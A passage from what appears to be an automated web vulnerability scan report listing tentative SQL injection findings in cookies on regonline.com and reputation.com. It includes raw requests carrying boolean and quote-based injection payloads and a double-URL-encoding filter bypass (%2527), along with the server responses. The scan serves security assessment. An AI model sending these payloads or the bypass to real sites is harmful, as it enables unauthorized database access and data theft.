Cookie: JSESSIONID=474FF8A3747940CE0B8EDFC5B898F977; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)''; qcPageID=0; __utma=14861494.1792645891.1297862294.1298206755.1298496833.3; __utmc=14861494; __utmb=14861494.4.8.1298496835385; __qca=P0-1138661367-1297862290557; qcVisitor=2|47|1297862270597|16|NOTSET;

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: qcVisitor=2|47|1297862270597|17|NOTSET; Expires=Fri, 15-Feb-2041 22:28:24 GMT; Path=/
Date: Wed, 23 Feb 2011 22:28:29 GMT
Expires: Wed, 23 Feb 2011 23:28:29 GMT
Cache-control: public, max-age=3600
Public-page: true
Set-Cookie: JSESSIONID=4940571E868B65E8BD057596DE8BD271; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/
...[SNIP]...

1.12. http://www.regonline.com/Register/Checkin.aspx [ASP.NET_SessionId cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regonline.com
Path:   /Register/Checkin.aspx

Issue detail

The ASP.NET_SessionId cookie appears to be vulnerable to SQL injection attacks. The payloads 14542449'%20or%201%3d1--%20 and 14542449'%20or%201%3d2--%20 were each submitted in the ASP.NET_SessionId cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /Register/Checkin.aspx?EventID=903860 HTTP/1.1
Host: www.regonline.com
Proxy-Connection: keep-alive
Referer: http://www.regonline.com/Register/Checkin.aspx?EventID=903860
Cache-Control: max-age=0
Origin: http://www.regonline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu4514542449'%20or%201%3d1--%20; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F
Content-Length: 197

__VIEWSTATE=%2FwEPDwULLTE4NzA0MTExMDJkZEX%2FEKbnROnJxseblFE7jHDDFNbZ&ctl00%24cph%24ctlEmailMemID%24txtEmail=%27%40%27.com&radRegType=419299&ctl00%24cph%24txtDiscountCode=&ctl00%24cph%24btnContinue=

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: no-cache, no-store
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:36:27 GMT
Expires: -1
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=ylqsom55dwxvaxewcebgk5iy; path=/; HttpOnly
Content-Length: 24814

<!DOCTYPE html>
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="content-language" content="en" /><title>
   SOURCE Boston 2011 - RegOn
...[SNIP]...
<a href="http://www.regonline.com/__articles/products/online~registration~forms" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Registration Form</a>
                       |
                   <a href="http://www.regonline.com/__articles/products/event~planning~software" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Event Planning Software</a>
                       |
                   <a href="http://www.regonline.com/__articles/products/online~registration~forms" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Registration Forms</a></div>
</div>
</div>


<!--[if lte IE 8]>
</td>
</tr>
</table>
<![endif]-->


<div id="outsideFooter"></div>

</div>

<script type="text/javascript" src="https://www.activestatic.net/ScriptCombiner.axd?s=Integrations&amp;v=-1467147683"></script>

<script type="text/javascript" src="https://www.activestatic.net/ScriptCombiner.axd?s=Register&amp;v=-838054830"></script>
<script type='text/javascript'>var gImagesDomain = 'https://www.activestatic.net/images'; var gAjaxErrorMsg = 'Your last action was unsuccessful. Try again, or click your browser\'s <strong>Refresh</strong> button.';gDecimalSeparator='.';gGroupSeparator=',';</script>
<script type="text/javascript">
var gEmailClientID = 'ctl00_cph_ctlEmailMemID_txtEmail';
var gVerifyEmailClientID = 'ctl00_cph_ctlEmailMemID_txtVerifyEmail';
var gMembershipIDClientID = 'ctl00_cph_ctlEmailMemID_txtMemID';
var gAlreadyRegClientID = 'ctl00_cph_ctlEmailMemID_lnkAlreadyRegistered';
var gValidationDependencies = {};
gValidationDependencies[gEmailClientID] = gMembershipIDClientID;
gValidationDependencies[gMembershipIDClientID] = gEmailClientID;


</script>


<script type="text/javascript">
       var discountCodeLiId = '#ctl00_cph_liDiscountC
...[SNIP]...

Request 2

POST /Register/Checkin.aspx?EventID=903860 HTTP/1.1
Host: www.regonline.com
Proxy-Connection: keep-alive
Referer: http://www.regonline.com/Register/Checkin.aspx?EventID=903860
Cache-Control: max-age=0
Origin: http://www.regonline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu4514542449'%20or%201%3d2--%20; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F
Content-Length: 197

__VIEWSTATE=%2FwEPDwULLTE4NzA0MTExMDJkZEX%2FEKbnROnJxseblFE7jHDDFNbZ&ctl00%24cph%24ctlEmailMemID%24txtEmail=%27%40%27.com&radRegType=419299&ctl00%24cph%24txtDiscountCode=&ctl00%24cph%24btnContinue=

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: no-cache, no-store
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:36:27 GMT
Expires: -1
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=rkn4yuum3fm5n3b5w0ceui45; path=/; HttpOnly
Content-Length: 24790

<!DOCTYPE html>
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="content-language" content="en" /><title>
   SOURCE Boston 2011 - RegOn
...[SNIP]...
<a href="http://www.regonline.com/__articles/products/event~planning~software" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Event Planning Software</a>
                       |
                   <a href="http://www.activegovernment.com/marketing-services/municipal-marketing.htm" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Municipal Marketing</a>
                       |
                   <a href="http://www.activeendurance.com/running.htm" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Running Software</a></div>
</div>
</div>


<!--[if lte IE 8]>
</td>
</tr>
</table>
<![endif]-->


<div id="outsideFooter"></div>

</div>

<script type="text/javascript" src="https://www.activestatic.net/ScriptCombiner.axd?s=Integrations&amp;v=-1467147683"></script>

<script type="text/javascript" src="https://www.activestatic.net/ScriptCombiner.axd?s=Register&amp;v=-838054830"></script>
<script type='text/javascript'>var gImagesDomain = 'https://www.activestatic.net/images'; var gAjaxErrorMsg = 'Your last action was unsuccessful. Try again, or click your browser\'s <strong>Refresh</strong> button.';gDecimalSeparator='.';gGroupSeparator=',';</script>
<script type="text/javascript">
var gEmailClientID = 'ctl00_cph_ctlEmailMemID_txtEmail';
var gVerifyEmailClientID = 'ctl00_cph_ctlEmailMemID_txtVerifyEmail';
var gMembershipIDClientID = 'ctl00_cph_ctlEmailMemID_txtMemID';
var gAlreadyRegClientID = 'ctl00_cph_ctlEmailMemID_lnkAlreadyRegistered';
var gValidationDependencies = {};
gValidationDependencies[gEmailClientID] = gMembershipIDClientID;
gValidationDependencies[gMembershipIDClientID] = gEmailClientID;


</script>


<script type="text/javascript">
       var discountCodeLiId = '#ctl00_cph_liDiscountCode';
       var regTypeDDLI
...[SNIP]...

1.13. https://www.regonline.com/Register/WebResource.axd [CurrentROLSession cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.regonline.com
Path:   /Register/WebResource.axd

Issue detail

The CurrentROLSession cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CurrentROLSession cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the CurrentROLSession cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Register/WebResource.axd HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=%2527; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:40:19 GMT
Connection: close
X-Powered-By: ASP.NET
Content-Length: 19098


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title>


...[SNIP]...
<img src="/__images/global/ErrorImage.jpg" alt="404 Error" />
...[SNIP]...

Request 2

GET /Register/WebResource.axd HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=%2527%2527; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;

Response 2

HTTP/1.1 302 Found
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:40:19 GMT
Location: https://regonline.activeeurope.com/__404.aspx
Connection: close
Content-Length: 162

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://regonline.activeeurope.com/__404.aspx">here</a>.</h2>
</body></html>

1.14. http://www.reputation.com/ [region cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reputation.com
Path:   /

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 01:51:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:51:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=cr9mtt4r59r253pvqk5sko5292; expires=Sat, 19-Apr-2014 01:51:37 GMT; path=/; domain=www.reputation.com
Set-Cookie: repdef_ref_code=RCPT2; expires=Thu, 19-May-2011 01:51:37 GMT; path=/
Vary: Accept-Encoding
Content-Length: 107121
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- Elapsed Time: 0.1098530292511
...[SNIP]...

1.15. http://www.reputation.com/blog/ [region cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reputation.com
Path:   /blog/

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/ HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; _bizo_cksm_crc32=2672111A; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_np_stats=753%3D184%2C; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.3.9.1303177777739

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 01:53:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /blog/ HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; _bizo_cksm_crc32=2672111A; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_np_stats=753%3D184%2C; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.3.9.1303177777739

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:53:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:53:43 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:53:43 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:53:43 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:53:43 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:53:43 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:53:43 GMT; path=/
Set-Cookie: shoppingCart=cr9mtt4r59r253pvqk5sko5292; expires=Sat, 19-Apr-2014 01:53:44 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 141597
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.16. http://www.reputation.com/blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/ [region cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reputation.com
Path:   /blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/ HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/blog/?s=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; repdef_ref_code=RCPT2; uuid=4dacec4601ec9; shoppingCart=cr9mtt4r59r253pvqk5sko5292; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=B0F0FDA5; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.52.9.1303178295497; _bizo_np_stats=753%3D280%2C; __ar_v4=FWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A7%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A7%7CADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A7

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 02:12:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/ HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/blog/?s=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; repdef_ref_code=RCPT2; uuid=4dacec4601ec9; shoppingCart=cr9mtt4r59r253pvqk5sko5292; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=B0F0FDA5; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.52.9.1303178295497; _bizo_np_stats=753%3D280%2C; __ar_v4=FWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A7%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A7%7CADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A7

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 02:12:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:12:19 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:12:19 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:12:19 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:12:19 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:12:19 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:12:19 GMT; path=/
Set-Cookie: shoppingCart=qua93ksa55ud9ln7chqb63fue4; expires=Sat, 19-Apr-2014 02:12:20 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 124259
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.17. http://www.reputation.com/contact [region cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reputation.com
Path:   /contact

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /contact HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 01:52:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /contact HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:52:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=cr9mtt4r59r253pvqk5sko5292; expires=Sat, 19-Apr-2014 01:52:02 GMT; path=/; domain=www.reputation.com
